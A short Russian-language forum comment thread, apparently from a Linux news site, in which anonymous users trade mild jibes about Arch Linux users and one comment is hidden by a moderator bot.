  • 1.133, Аноним (133), 18:14, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Арчешкольники, что с лицом?
     
     
  • 2.136, Аноним (141), 18:36, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    У меня улыбка на лице - смешно читать злорадные комменты и пользоваться быстрым, лёгким и безопасным арчем
     
  • 2.138, Аноним (71), 19:06, 02/08/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру